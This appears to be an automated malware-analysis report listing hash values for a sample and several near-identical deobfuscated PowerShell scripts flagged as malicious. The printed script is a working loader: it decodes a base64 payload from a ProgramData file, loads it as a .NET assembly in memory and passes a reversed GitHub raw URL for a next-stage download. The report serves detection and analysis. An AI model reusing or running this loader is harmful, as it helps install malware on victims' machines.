|
Hash | Hash Value |
|---|---|
| MD5 | 5310a4e454129a4a396555497e7de51e
|
| Sha1 | 18a35c1e773d8ee850382c7d5007b5c9f1135479
|
| Sha256 | b680dc5815223eff566b30fa251267b91b1f10d2eec2522311def684b4baf59a
|
| Sha384 | 4c5cd27a10866b45643ea3d95dc401a3648b2d50dd10f61e7560090e4106e757d0e9c8ea32750f83bdaab10bcc00924b
|
| Sha512 | 1bf91b899a596e9ce417bc2e37d6f00ef18555409038547a58a987bfd90e584302b0c0f309f25303498d0c08bcec5675db2bc7eca325ff4260c153732093b16a
|
| SSDeep | 24:Qlv4o4Kzyu52U/tMlBygklBRlB0P8wPMuZJBlBMwA6PFv+F5TK:A4oPtM7ktApDPwF5TK
|
| TLSH | 0F218E10AAFC8E05B673DA0997BBE49015767AECDD35CB0CC354C10C16AE944D866F37
|
|
Name | Value |
|---|---|
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\sostener.vbs", "____________________________________________-------", "0", "1", "caca"))) |
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\sostener.vbs", "____________________________________________-------", "0", "1", "caca") } ))) |
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\sostener.vbs", "____________________________________________-------", "0", "1", "caca") } )) |
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\sostener.vbs", "____________________________________________-------", "0", "1", "caca") } )) |
|
Name | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\sostener.vbs", "____________________________________________-------", "0", "1", "caca"))) Malicious |
5310a4e454129a4a396555497e7de51e |
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\sostener.vbs", "____________________________________________-------", "0", "1", "caca") } ))) Malicious |
5310a4e454129a4a396555497e7de51e > [Deobfuscated PS] |
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\sostener.vbs", "____________________________________________-------", "0", "1", "caca") } )) Malicious |
5310a4e454129a4a396555497e7de51e > [Deobfuscated PS] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\sostener.vbs", "____________________________________________-------", "0", "1", "caca") } )) Malicious |
5310a4e454129a4a396555497e7de51e > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] |